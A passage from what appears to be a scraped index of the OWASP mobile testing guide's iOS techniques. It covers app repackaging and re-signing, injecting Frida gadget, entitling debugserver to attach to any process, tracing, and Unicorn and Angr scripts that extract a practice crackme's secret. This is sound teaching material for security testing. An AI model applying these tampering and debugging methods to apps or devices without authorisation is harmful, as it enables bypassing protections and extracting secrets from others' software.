Manually analyzing all the native functions completely will be time consuming and might not be the wisest approach. In such a scenario using a dynamic analysis approach is highly recommended. For instance, by using the techniques like hooking or simply debugging the application, we can easily determine the returned values. Normally it's a good idea to use a dynamic analysis approach and then fallback to manually analyzing the functions in a feedback loop. This way you can benefit from both approaches at the same time while saving time and reducing effort. Dynamic analysis techniques are discussed in \"Dynamic Analysis\" section.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0078/","title":"Automated Static Analysis","text":"Several automated tools for analyzing iOS apps are available; most of them are commercial tools. The free and open source tools MobSF and objection have some static and dynamic analysis functionality. Additional tools are listed in the \"Static Source Code Analysis\" section of the \"Testing Tools\" chapter.
Don't shy away from using automated scanners for your analysis - they help you pick low-hanging fruit and allow you to focus on the more interesting aspects of analysis, such as the business logic. Keep in mind that static analyzers may produce false positives and false negatives; always review the findings carefully.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0079/","title":"Dynamic Analysis on Non-Jailbroken Devices","text":"If you don't have access to a jailbroken device, you can patch and repackage the target app to load a dynamic library at startup (e.g. the Frida gadget to enable dynamic testing with Frida and related tools such as objection). This way, you can instrument the app and do everything you need to do for dynamic analysis (of course, you can't break out of the sandbox this way). However, this technique only works if the app binary isn't FairPlay-encrypted (i.e., obtained from the App Store).
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0079/#automated-repackaging","title":"Automated Repackaging","text":"Objection automates the process of app repackaging. You can find exhaustive documentation on the official wiki pages.
Using objection's repackaging feature is sufficient for most use cases. However, in some complex scenarios you might need more fine-grained control or a more customizable repackaging process. In that case, you can read a detailed explanation of the repackaging and resigning process in \"Manual Repackaging\".
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0079/#manual-repackaging","title":"Manual Repackaging","text":"Thanks to Apple's confusing provisioning and code-signing system, re-signing an app is more challenging than you would expect. iOS won't run an app unless you get the provisioning profile and code signature header exactly right. This requires learning many concepts-certificate types, Bundle IDs, application IDs, team identifiers, and how Apple's build tools connect them. Getting the OS to run a binary that hasn't been built via the default method (Xcode) can be a daunting process.
We'll use optool, Apple's build tools, and some shell commands. Our method is inspired by Vincent Tan's Swizzler project. The NCC group has described an alternative repackaging method.
To reproduce the steps listed below, download UnCrackable App for iOS Level 1 from the OWASP Mobile Testing Guide repository. Our goal is to make the UnCrackable app load FridaGadget.dylib
during startup so we can instrument the app with Frida.
Please note that the following steps apply to macOS only, as Xcode is only available for macOS.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0079/#getting-a-developer-provisioning-profile-and-certificate","title":"Getting a Developer Provisioning Profile and Certificate","text":"The provisioning profile is a plist file signed by Apple, which adds your code-signing certificate to its list of accepted certificates on one or more devices. In other words, this represents Apple explicitly allowing your app to run for certain reasons, such as debugging on selected devices (development profile). The provisioning profile also includes the entitlements granted to your app. The certificate contains the private key you'll use to sign.
Depending on whether you're registered as an iOS developer, you can obtain a certificate and provisioning profile in one of the following ways:
With an iOS developer account:
If you've developed and deployed iOS apps with Xcode before, you already have your own code-signing certificate installed. Use the security
command (macOS only) to list your signing identities:
$ security find-identity -v\n 1) 61FA3547E0AF42A11E233F6A2B255E6B6AF262CE \"iPhone Distribution: Company Name Ltd.\"\n 2) 8004380F331DCA22CC1B47FB1A805890AE41C938 \"iPhone Developer: Bernhard M\u00fcller (RV852WND79)\"\n
Log into the Apple Developer portal to issue a new App ID, then issue and download the profile. An App ID is a two-part string: a Team ID supplied by Apple and a bundle ID search string that you can set to an arbitrary value, such as com.example.myapp
. Note that you can use a single App ID to re-sign multiple apps. Make sure you create a development profile and not a distribution profile so that you can debug the app.
In the examples below, I use my signing identity, which is associated with my company's development team. I created the App ID \"sg.vp.repackaged\" and the provisioning profile \"AwesomeRepackaging\" for these examples. I ended up with the file AwesomeRepackaging.mobileprovision
-replace this with your own filename in the shell commands below.
With a Regular Apple ID:
Apple will issue a free development provisioning profile even if you're not a paying developer. You can obtain the profile via Xcode and your regular Apple account: simply create an empty iOS project and extract embedded.mobileprovision
from the app container, which is in the Xcode subdirectory of your home directory: ~/Library/Developer/Xcode/DerivedData/<ProjectName>/Build/Products/Debug-iphoneos/<ProjectName>.app/
. The NCC blog post \"iOS instrumentation without jailbreak\" explains this process in great detail.
Once you've obtained the provisioning profile, you can check its contents with the security
command. You'll find the entitlements granted to the app in the profile, along with the allowed certificates and devices. You'll need these for code-signing, so extract them to a separate plist file as shown below. Have a look at the file contents to make sure everything is as expected.
$ security cms -D -i AwesomeRepackaging.mobileprovision > profile.plist\n$ /usr/libexec/PlistBuddy -x -c 'Print :Entitlements' profile.plist > entitlements.plist\n$ cat entitlements.plist\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n<dict>\n <key>application-identifier</key>\n <string>LRUD9L355Y.sg.vantagepoint.repackage</string>\n <key>com.apple.developer.team-identifier</key>\n <string>LRUD9L355Y</string>\n <key>get-task-allow</key>\n <true/>\n <key>keychain-access-groups</key>\n <array>\n <string>LRUD9L355Y.*</string>\n </array>\n</dict>\n</plist>\n
Note the application identifier, which is a combination of the Team ID (LRUD9L355Y) and Bundle ID (sg.vantagepoint.repackage). This provisioning profile is only valid for the app that has this App ID. The get-task-allow
key is also important: when set to true
, other processes, such as the debugging server, are allowed to attach to the app (consequently, this would be set to false
in a distribution profile).
lsof
is a powerful command, and provides a plethora of information about a running process. It can provide a list of all open files, including a stream, a network file or a regular file. When invoking the lsof
command without any option it will list all open files belonging to all active processes on the system, while when invoking with the flags -c <process name>
or -p <pid>
, it returns the list of open files for the specified process. The man page shows various other options in detail.
Using lsof
for an iOS application running with PID 2828 lists the various open files, as shown below.
iPhone:~ root# lsof -p 2828\nCOMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME\niOweApp 2828 mobile cwd DIR 1,2 864 2 /\niOweApp 2828 mobile txt REG 1,3 206144 189774 /private/var/containers/Bundle/Application/F390A491-3524-40EA-B3F8-6C1FA105A23A/iOweApp.app/iOweApp\niOweApp 2828 mobile txt REG 1,3 5492 213230 /private/var/mobile/Containers/Data/Application/5AB3E437-9E2D-4F04-BD2B-972F6055699E/tmp/com.apple.dyld/iOweApp-6346DC276FE6865055F1194368EC73CC72E4C5224537F7F23DF19314CF6FD8AA.closure\niOweApp 2828 mobile txt REG 1,3 30628 212198 /private/var/preferences/Logging/.plist-cache.vqXhr1EE\niOweApp 2828 mobile txt REG 1,2 50080 234433 /usr/lib/libobjc-trampolines.dylib\niOweApp 2828 mobile txt REG 1,2 344204 74185 /System/Library/Fonts/AppFonts/ChalkboardSE.ttc\niOweApp 2828 mobile txt REG 1,2 664848 234595 /usr/lib/dyld\n...\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0081/","title":"Get Open Connections","text":"lsof
command, when invoked with the option -i
, gives the list of open network ports for all active processes on the device. To get a list of open network ports for a specific process, the lsof -i -a -p <pid>
command can be used, where -a
(AND) option is used for filtering. Below a filtered output for PID 1 is shown.
iPhone:~ root# lsof -i -a -p 1\nCOMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME\nlaunchd 1 root 27u IPv6 0x69c2ce210efdc023 0t0 TCP *:ssh (LISTEN)\nlaunchd 1 root 28u IPv6 0x69c2ce210efdc023 0t0 TCP *:ssh (LISTEN)\nlaunchd 1 root 29u IPv4 0x69c2ce210eeaef53 0t0 TCP *:ssh (LISTEN)\nlaunchd 1 root 30u IPv4 0x69c2ce210eeaef53 0t0 TCP *:ssh (LISTEN)\nlaunchd 1 root 31u IPv4 0x69c2ce211253b90b 0t0 TCP 192.168.1.12:ssh->192.168.1.8:62684 (ESTABLISHED)\nlaunchd 1 root 42u IPv4 0x69c2ce211253b90b 0t0 TCP 192.168.1.12:ssh->192.168.1.8:62684 (ESTABLISHED)\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0082/","title":"Get Loaded Native Libraries","text":""},{"location":"MASTG/techniques/ios/MASTG-TECH-0082/#using-objection","title":"Using Objection","text":"You can use the list_frameworks
command in objection to list all the application's bundles that represent Frameworks.
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ios bundles list_frameworks\nExecutable Bundle Version Path\n-------------- ----------------------------------------- --------- -------------------------------------------\nBolts org.cocoapods.Bolts 1.9.0 ...8/DVIA-v2.app/Frameworks/Bolts.framework\nRealmSwift org.cocoapods.RealmSwift 4.1.1 ...A-v2.app/Frameworks/RealmSwift.framework\n ...ystem/Library/Frameworks/IOKit.framework\n...\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0082/#using-frida","title":"Using Frida","text":"In Frida REPL process related information can be obtained using the Process
command. Within the Process
command the function enumerateModules
lists the libraries loaded into the process memory.
[iPhone::com.iOweApp]-> Process.enumerateModules()\n[\n {\n \"base\": \"0x10008c000\",\n \"name\": \"iOweApp\",\n \"path\": \"/private/var/containers/Bundle/Application/F390A491-3524-40EA-B3F8-6C1FA105A23A/iOweApp.app/iOweApp\",\n \"size\": 49152\n },\n {\n \"base\": \"0x1a1c82000\",\n \"name\": \"Foundation\",\n \"path\": \"/System/Library/Frameworks/Foundation.framework/Foundation\",\n \"size\": 2859008\n },\n {\n \"base\": \"0x1a16f4000\",\n \"name\": \"libobjc.A.dylib\",\n \"path\": \"/usr/lib/libobjc.A.dylib\",\n \"size\": 200704\n },\n\n ...\n
Similarly, information related to various threads can be obtained.
Process.enumerateThreads()\n[\n {\n \"context\": {\n ...\n },\n \"id\": 1287,\n \"state\": \"waiting\"\n },\n\n ...\n
The Process
command exposes multiple functions which can be explored as per needs. Some useful functions are findModuleByAddress
, findModuleByName
and enumerateRanges
besides others.
On iOS, each application gets a sandboxed folder to store its data. As per the iOS security model, an application's sandboxed folder cannot be accessed by another application. Additionally, the users do not have direct access to the iOS filesystem, thus preventing browsing or extraction of data from the filesystem. In iOS < 8.3 there were applications available which can be used to browse the device's filesystem, such as iExplorer and iFunBox, but in recent versions of iOS (>8.3) the sandboxing rules are more stringent and these applications do not work anymore. As a result, if you need to access the filesystem it can only be accessed on a jailbroken device. As part of the jailbreaking process, the application sandbox protection is disabled, thus enabling easy access to sandboxed folders.
The contents of an application's sandboxed folder have already been discussed in \"Accessing App Data Directories\" in the chapter iOS Basic Security Testing. This chapter gives an overview of the folder structure and which directories you should analyze.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0084/","title":"Debugging","text":"Coming from a Linux background you'd expect the ptrace
system call to be as powerful as you're used to but, for some reason, Apple decided to leave it incomplete. iOS debuggers such as LLDB use it for attaching, stepping or continuing the process but they cannot use it to read or write memory (all PT_READ_*
and PT_WRITE*
requests are missing). Instead, they have to obtain a so-called Mach task port (by calling task_for_pid
with the target process ID) and then use the Mach IPC interface API functions to perform actions such as suspending the target process and reading/writing register states (thread_get_state
/thread_set_state
) and virtual memory (mach_vm_read
/mach_vm_write
).
For more information you can refer to the LLVM project in GitHub which contains the source code for LLDB as well as Chapter 5 and 13 from \"Mac OS X and iOS Internals: To the Apple's Core\" [#levin] and Chapter 4 \"Tracing and Debugging\" from \"The Mac Hacker's Handbook\" [#miller].
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0084/#debugging-with-lldb","title":"Debugging with LLDB","text":"The default debugserver executable that Xcode installs can't be used to attach to arbitrary processes (it is usually used only for debugging self-developed apps deployed with Xcode). To enable debugging of third-party apps, the task_for_pid-allow
entitlement must be added to the debugserver executable so that the debugger process can call task_for_pid
to obtain the target Mach task port as seen before. An easy way to do this is to add the entitlement to the debugserver binary shipped with Xcode.
To obtain the executable, mount the following DMG image:
/Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/DeviceSupport/<target-iOS-version>/DeveloperDiskImage.dmg\n
You'll find the debugserver executable in the /usr/bin/
directory on the mounted volume. Copy it to a temporary directory, then create a file called entitlements.plist
with the following content:
<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/ PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n<dict>\n <key>com.apple.springboard.debugapplications</key>\n <true/>\n <key>run-unsigned-code</key>\n <true/>\n <key>get-task-allow</key>\n <true/>\n <key>task_for_pid-allow</key>\n <true/>\n</dict>\n</plist>\n
Apply the entitlement with codesign:
codesign -s - --entitlements entitlements.plist -f debugserver\n
Copy the modified binary to any directory on the test device. The following examples use usbmuxd to forward a local port through USB.
iproxy 2222 22\nscp -P 2222 debugserver root@localhost:/tmp/\n
Note: On iOS 12 and higher, use the following procedure to sign the debugserver binary obtained from the XCode image.
1) Copy the debugserver binary to the device via scp, for example, in the /tmp folder.
2) Connect to the device via SSH and create the file, named entitlements.xml, with the following content:
```xml\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n<dict>\n <key>platform-application</key>\n <true/>\n <key>com.apple.private.security.no-container</key>\n <true/>\n <key>com.apple.private.skip-library-validation</key>\n <true/>\n <key>com.apple.backboardd.debugapplications</key>\n <true/>\n <key>com.apple.backboardd.launchapplications</key>\n <true/>\n <key>com.apple.diagnosticd.diagnostic</key>\n <true/>\n <key>com.apple.frontboard.debugapplications</key>\n <true/>\n <key>com.apple.frontboard.launchapplications</key>\n <true/>\n <key>com.apple.security.network.client</key>\n <true/>\n <key>com.apple.security.network.server</key>\n <true/>\n <key>com.apple.springboard.debugapplications</key>\n <true/>\n <key>com.apple.system-task-ports</key>\n <true/>\n <key>get-task-allow</key>\n <true/>\n <key>run-unsigned-code</key>\n <true/>\n <key>task_for_pid-allow</key>\n <true/>\n</dict>\n</plist>\n```\n
3) Type the following command to sign the debugserver binary:
```bash\nldid -Sentitlements.xml debugserver\n```\n
4) Verify that the debugserver binary can be executed via the following command:
```bash\n./debugserver\n```\n
You can now attach debugserver to any process running on the device.
VP-iPhone-18:/tmp root# ./debugserver *:1234 -a 2670\ndebugserver-@(#)PROGRAM:debugserver PROJECT:debugserver-320.2.89\nfor armv7.\nAttaching to process 2670...\n
With the following command you can launch an application via debugserver running on the target device:
debugserver -x backboard *:1234 /Applications/MobileSMS.app/MobileSMS\n
Attach to an already running application:
debugserver *:1234 -a \"MobileSMS\"\n
You may connect now to the iOS device from your host computer:
(lldb) process connect connect://<ip-of-ios-device>:1234\n
Typing image list
gives a list of main executable and all dependent libraries.
In the previous section we learned about how to setup a debugging environment on an iOS device using LLDB. In this section we will use this information and learn how to debug a 3rd party release application. We will continue using the UnCrackable App for iOS Level 1 and solve it using a debugger.
In contrast to a debug build, the code compiled for a release build is optimized to achieve maximum performance and minimum binary build size. As a general best practice, most of the debug symbols are stripped for a release build, adding a layer of complexity when reverse engineering and debugging the binaries.
Due to the absence of the debug symbols, symbol names are missing from the backtrace outputs and setting breakpoints by simply using function names is not possible. Fortunately, debuggers also support setting breakpoints directly on memory addresses. Further in this section we will learn how to do so and eventually solve the crackme challenge.
Some groundwork is needed before setting a breakpoint using memory addresses. It requires determining two offsets:
iOS is a modern operating system with multiple techniques implemented to mitigate code execution attacks, one such technique being Address Space Layout Randomization (ASLR). On every new execution of an application, a random ASLR shift offset is generated, and various process' data structures are shifted by this offset.
The final breakpoint address to be used in the debugger is the sum of the above two addresses (Breakpoint offset + ASLR shift offset). This approach assumes that the image base address (discussed shortly) used by the disassembler and iOS is the same, which is true most of the time.
When a binary is opened in a disassembler like Ghidra, it loads a binary by emulating the respective operating system's loader. The address at which the binary is loaded is called image base address. All the code and symbols inside this binary can be addressed using a constant address offset from this image base address. In Ghidra, the image base address can be obtained by determining the address of the start of a Mach-O file. In this case, it is 0x100000000.
From our previous analysis of the UnCrackable App for iOS Level 1 in \"Manual (Reversed) Code Review\" section, the value of the hidden string is stored in a label with the hidden
flag set. In the disassembly, the text value of this label is stored in register X21
, stored via mov
from X0
, at offset 0x100004520. This is our breakpoint offset.
For the second address, we need to determine the ASLR shift offset for a given process. The ASLR offset can be determined by using the LLDB command image list -o -f
. The output is shown in the screenshot below.
In the output, the first column contains the sequence number of the image ([X]), the second column contains the randomly generated ASLR offset, while the third column contains the full path of the image and, towards the end, the content in the brackets shows the image base address after adding the ASLR offset to the original image base address (0x100000000 + 0x70000 = 0x100070000). You will notice the image base address of 0x100000000 is the same as in Ghidra. Now, to obtain the effective memory address for a code location we only need to add the ASLR offset to the address identified in Ghidra. The effective address to set the breakpoint will be 0x100004520 + 0x70000 = 0x100074520. The breakpoint can be set using the command b 0x100074520
.
In the above output, you may also notice that many of the paths listed as images do not point to the file system on the iOS device. Instead, they point to a certain location on the host computer on which LLDB is running. These images are system libraries for which debug symbols are available on the host computer to aid in application development and debugging (as part of the Xcode iOS SDK). Therefore, you may set breakpoints to these libraries directly by using function names.
After putting the breakpoint and running the app, the execution will be halted once the breakpoint is hit. Now you can access and explore the current state of the process. In this case, you know from the previous static analysis that the register X0
contains the hidden string, thus let's explore it. In LLDB you can print Objective-C objects using the po
(print object) command.
Voila, the crackme can be easily solved aided by static analysis and a debugger. There is a plethora of features implemented in LLDB, including changing the value of the registers, changing values in the process memory and even automating tasks using Python scripts.
Officially Apple recommends the use of LLDB for debugging purposes, but GDB can also be used on iOS. The techniques discussed above are applicable while debugging using GDB as well, provided the LLDB-specific commands are changed to GDB commands.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0085/","title":"Execution Tracing","text":"Tracing involves recording the information about a program's execution. In contrast to Android, there are limited options available for tracing various aspects of an iOS app. In this section we will be heavily relying on tools such as Frida for performing tracing.
TODO: This needs to be improved as well
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0086/","title":"Method Tracing","text":"Intercepting Objective-C methods is a useful iOS security testing technique. For example, you may be interested in data storage operations or network requests. In the following example, we'll write a simple tracer for logging HTTP(S) requests made via iOS standard HTTP APIs. We'll also show you how to inject the tracer into the Safari web browser.
In the following examples, we'll assume that you are working on a jailbroken device. If that's not the case, you first need to follow the steps outlined in section Repackaging and Re-Signing to repackage the Safari app.
Frida comes with frida-trace
, a function tracing tool. frida-trace
accepts Objective-C methods via the -m
flag. You can pass it wildcards as well-given -[NSURL *]
, for example, frida-trace
will automatically install hooks on all NSURL
class selectors. We'll use this to get a rough idea about which library functions Safari calls when the user opens a URL.
Run Safari on the device and make sure the device is connected via USB. Then start frida-trace
as follows:
$ frida-trace -U -m \"-[NSURL *]\" Safari\nInstrumenting functions...\n-[NSURL isMusicStoreURL]: Loaded handler at \"/Users/berndt/Desktop/__handlers__/__NSURL_isMusicStoreURL_.js\"\n-[NSURL isAppStoreURL]: Loaded handler at \"/Users/berndt/Desktop/__handlers__/__NSURL_isAppStoreURL_.js\"\n(...)\nStarted tracing 248 functions. Press Ctrl+C to stop.\n
Next, navigate to a new website in Safari. You should see traced function calls on the frida-trace
console. Note that the initWithURL:
method is called to initialize a new URL request object.
/* TID 0xc07 */\n 20313 ms -[NSURLRequest _initWithCFURLRequest:0x1043bca30 ]\n 20313 ms -[NSURLRequest URL]\n(...)\n 21324 ms -[NSURLRequest initWithURL:0x106388b00 ]\n 21324 ms | -[NSURLRequest initWithURL:0x106388b00 cachePolicy:0x0 timeoutInterval:0x106388b80\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0087/","title":"Native Code Tracing","text":"As discussed earlier in this chapter, iOS applications can also contain native code (C/C++ code) and it can be traced using the frida-trace
CLI as well. For example, you can trace calls to the open
function by running the following command:
frida-trace -U -i \"open\" sg.vp.UnCrackable1\n
The overall approach and further improvements for tracing native code using Frida are similar to those discussed in the Android \"Tracing\" section.
Unfortunately, there are no tools such as strace
or ftrace
available to trace syscalls or function calls of an iOS app. Only DTrace
exists, which is a very powerful and versatile tracing tool, but it's only available for macOS and not for iOS.
Apple provides a simulator app within Xcode which provides a user interface that looks like a real iOS device for iPhone, iPad or Apple Watch. It allows you to rapidly prototype and test debug builds of your applications during the development process, but it is actually not an emulator. The difference between a simulator and an emulator was previously discussed in the \"Emulation-based Dynamic Analysis\" section.
While developing and debugging an application, the Xcode toolchain generates x86 code, which can be executed in the iOS simulator. However, for a release build, only ARM code is generated (incompatible with the iOS simulator). That's why applications downloaded from the Apple App Store cannot be used for any kind of application analysis on the iOS simulator.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0088/#corellium","title":"Corellium","text":"Corellium is a commercial tool which offers virtual iOS devices running actual iOS firmware, being the only publicly available iOS emulator ever. Since it is a proprietary product, not much information is available about the implementation. Corellium has no community licenses available, therefore we won't go into much detail regarding its use.
Corellium allows you to launch multiple instances of a device (jailbroken or not) which are accessible as local devices (with a simple VPN configuration). It has the ability to take and restore snapshots of the device state, and also offers a convenient web-based shell to the device. Finally and most importantly, due to its \"emulator\" nature, you can execute applications downloaded from the Apple App Store, enabling any kind of application analysis as you know it from real iOS (jailbroken) devices.
Note that in order to install an IPA on Corellium devices it has to be unencrypted and signed with a valid Apple developer certificate. See more information here.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0088/#unicorn","title":"Unicorn","text":"Unicorn is a lightweight, multi-architecture CPU emulator framework based on QEMU and goes beyond it by adding useful features especially made for CPU emulation. Unicorn provides the basic infrastructure needed to execute processor instructions. In this section we will use Unicorn's Python bindings to solve the UnCrackable App for iOS Level 1 challenge.
To use Unicorn's full power, we would need to implement all the necessary infrastructure which generally is readily available from the operating system, e.g. binary loader, linker and other dependencies or use another higher level frameworks such as Qiling which leverages Unicorn to emulate CPU instructions, but understands the OS context. However, this is superfluous for this very localized challenge where only executing a small part of the binary will suffice.
While performing manual analysis in \"Reviewing Disassembled Native Code\" section, we determined that the function at address 0x1000080d4 is responsible for dynamically generating the secret string. As we're about to see, all the necessary code is pretty much self-contained in the binary, making this a perfect scenario to use a CPU emulator like Unicorn.
If we analyze that function and the subsequent function calls, we will observe that there is no hard dependency on any external library and neither it's performing any system calls. The only access external to the functions occurs for instance at address 0x1000080f4, where a value is being stored to address 0x10000dbf0, which maps to the __data
section.
Therefore, in order to correctly emulate this section of the code, apart from the __text
section (which contains the instructions) we also need to load the __data
section.
To solve the challenge using Unicorn we will perform the following steps:
lipo -thin arm64 <app_binary> -output uncrackable.arm64
(ARMv7 can be used as well).__text
and __data
section from the binary.__text
and __data
section.To extract the content of __text
and __data
section from the Mach-O binary we will use LIEF, which provides a convenient abstraction to manipulate multiple executable file formats. Before loading these sections to memory, we need to determine their base addresses, e.g. by using Ghidra, Radare2 or IDA Pro.
From the above table, we will use the base address 0x10000432c for __text
and 0x10000d3e8 for __data
section to load them at in the memory.
While allocating memory for Unicorn, the memory addresses should be 4k page aligned and also the allocated size should be a multiple of 1024.
The following script emulates the function at 0x1000080d4 and dumps the secret string:
import lief\nfrom unicorn import *\nfrom unicorn.arm64_const import *\n\n# --- Extract __text and __data section content from the binary ---\nbinary = lief.parse(\"uncrackable.arm64\")\ntext_section = binary.get_section(\"__text\")\ntext_content = text_section.content\n\ndata_section = binary.get_section(\"__data\")\ndata_content = data_section.content\n\n# --- Setup Unicorn for ARM64 execution ---\narch = \"arm64le\"\nemu = Uc(UC_ARCH_ARM64, UC_MODE_ARM)\n\n# --- Create Stack memory ---\naddr = 0x40000000\nsize = 1024*1024\nemu.mem_map(addr, size)\nemu.reg_write(UC_ARM64_REG_SP, addr + size - 1)\n\n# --- Load text section --\nbase_addr = 0x100000000\ntmp_len = 1024*1024\ntext_section_load_addr = 0x10000432c\nemu.mem_map(base_addr, tmp_len)\nemu.mem_write(text_section_load_addr, bytes(text_content))\n\n# --- Load data section ---\ndata_section_load_addr = 0x10000d3e8\nemu.mem_write(data_section_load_addr, bytes(data_content))\n\n# --- Hack for stack_chk_guard ---\n# without this will throw invalid memory read at 0x0\nemu.mem_map(0x0, 1024)\nemu.mem_write(0x0, b\"00\")\n\n\n# --- Execute from 0x1000080d4 to 0x100008154 ---\nemu.emu_start(0x1000080d4, 0x100008154)\nret_value = emu.reg_read(UC_ARM64_REG_X0)\n\n# --- Dump return value ---\nprint(emu.mem_read(ret_value, 11))\n
You may notice that there is an additional memory allocation at address 0x0, this is a simple hack around stack_chk_guard
check. Without this, there will be an invalid memory read error and the binary cannot be executed. With this hack, the program will access the value at 0x0 and use it for the stack_chk_guard
check.
To summarize, using Unicorn does require some additional setup before executing the binary, but once done, this tool can help provide deep insights into the binary. It provides the flexibility to execute the full binary or a limited part of it. Unicorn also exposes APIs to attach hooks to the execution. Using these hooks you can observe the state of the program at any point during the execution or even manipulate the register or variable values and forcefully explore other execution branches in a program. Another advantage when running a binary in Unicorn is that you don't need to worry about various checks like root/jailbreak detection or debugger detection etc.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0089/","title":"Symbolic Execution","text":"An introduction to binary analysis using binary analysis frameworks has already been discussed in the \"Dynamic Analysis\" section for Android. We recommend you to revisit this section and refresh the concepts on this subject.
For Android, we used Angr's symbolic execution engine to solve a challenge. In this section, we will firstly use Unicorn to solve the UnCrackable App for iOS Level 1 challenge and then we will revisit the Angr binary analysis framework to analyze the challenge but instead of symbolic execution we will use its concrete execution (or dynamic execution) features.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0089/#angr","title":"Angr","text":"Angr is a very versatile tool, providing multiple techniques to facilitate binary analysis, while supporting various file formats and hardware instructions sets.
The Mach-O backend in Angr is not well-supported, but it works perfectly fine for our case.
While manually analyzing the code in the \"Reviewing Disassembled Native Code\" section, we reached a point where performing further manual analysis was cumbersome. The function at offset 0x1000080d4
was identified as the final target which contains the secret string.
If we revisit that function, we can see that it involves multiple sub-function calls and interestingly none of these functions have any dependencies on other library calls or system calls. This is a perfect case to use Angr's concrete execution engine. Follow the steps below to solve this challenge:
lipo -thin arm64 <app_binary> -output uncrackable.arm64
(ARMv7 can be used as well).Project
by loading the above binary.callable
object by passing the address of the function to be executed. From the Angr documentation: \"A Callable is a representation of a function in the binary that can be interacted with like a native python function.\".callable
object to the concrete execution engine, which in this case is claripy.backends.concrete
.import angr\nimport claripy\n\ndef solve():\n\n # Load the binary by creating angr project.\n project = angr.Project('uncrackable.arm64')\n\n # Pass the address of the function to the callable\n func = project.factory.callable(0x1000080d4)\n\n # Get the return value of the function\n ptr_secret_string = claripy.backends.concrete.convert(func()).value\n print(\"Address of the pointer to the secret string: \" + hex(ptr_secret_string))\n\n # Extract the value from the pointer to the secret string\n secret_string = func.result_state.mem[ptr_secret_string].string.concrete\n print(f\"Secret String: {secret_string}\")\n\nsolve()\n
Above, Angr executed an ARM64 code in an execution environment provided by one of its concrete execution engines. The result is accessed from the memory as if the program is executed on a real device. This case is a good example where binary analysis frameworks enable us to perform a comprehensive analysis of a binary, even in the absence of specialized devices needed to run it.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0090/","title":"Patching","text":"IPA files are actually ZIP archives, so you can use any ZIP tool to unpack the archive.
unzip UnCrackable-Level1.ipa\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0090/#patching-example-installing-frida-gadget","title":"Patching Example: Installing Frida Gadget","text":"If you want to use Frida on non-jailbroken devices you'll need to include FridaGadget.dylib
. Download it first:
curl -O https://build.frida.re/frida/ios/lib/FridaGadget.dylib\n
Copy FridaGadget.dylib
into the app directory and use optool to add a load command to the \"UnCrackable Level 1\" binary.
$ unzip UnCrackable_Level1.ipa\n$ cp FridaGadget.dylib Payload/UnCrackable\\ Level\\ 1.app/\n$ optool install -c load -p \"@executable_path/FridaGadget.dylib\" -t Payload/UnCrackable\\ Level\\ 1.app/UnCrackable\\ Level\\ 1\nFound FAT Header\nFound thin header...\nFound thin header...\nInserting a LC_LOAD_DYLIB command for architecture: arm\nSuccessfully inserted a LC_LOAD_DYLIB command for arm\nInserting a LC_LOAD_DYLIB command for architecture: arm64\nSuccessfully inserted a LC_LOAD_DYLIB command for arm64\nWriting executable to Payload/UnCrackable Level 1.app/UnCrackable Level 1...\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0090/#patching-example-making-an-app-debuggable","title":"Patching Example: Making an App Debuggable","text":"By default, an app available on the Apple App Store is not debuggable. In order to debug an iOS application, it must have the get-task-allow
entitlement enabled. This entitlement allows other processes (like a debugger) to attach to the app. Xcode is not adding the get-task-allow
entitlement in a distribution provisioning profile; it is only whitelisted and added in a development provisioning profile.
Thus, to debug an iOS application obtained from the App Store, it needs to be re-signed with a development provisioning profile with the get-task-allow
entitlement. How to re-sign an application is discussed in the next section.
If you want to use Frida on non-jailbroken devices you'll need to include FridaGadget.dylib
. Download it first:
curl -O https://build.frida.re/frida/ios/lib/FridaGadget.dylib\n
Copy FridaGadget.dylib
into the app directory and use optool to add a load command to the \"UnCrackable Level 1\" binary.
$ unzip UnCrackable-Level1.ipa\n$ cp FridaGadget.dylib Payload/UnCrackable\\ Level\\ 1.app/\n$ optool install -c load -p \"@executable_path/FridaGadget.dylib\" -t Payload/UnCrackable\\ Level\\ 1.app/UnCrackable\\ Level\\ 1\nFound FAT Header\nFound thin header...\nFound thin header...\nInserting a LC_LOAD_DYLIB command for architecture: arm\nSuccessfully inserted a LC_LOAD_DYLIB command for arm\nInserting a LC_LOAD_DYLIB command for architecture: arm64\nSuccessfully inserted a LC_LOAD_DYLIB command for arm64\nWriting executable to Payload/UnCrackable Level 1.app/UnCrackable Level 1...\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0091/#patching-example-making-an-app-debuggable","title":"Patching Example: Making an App Debuggable","text":"By default, an app available on the Apple App Store is not debuggable. In order to debug an iOS application, it must have the get-task-allow
entitlement enabled. This entitlement allows other processes (like a debugger) to attach to the app. Xcode is not adding the get-task-allow
entitlement in a distribution provisioning profile; it is only whitelisted and added in a development provisioning profile.
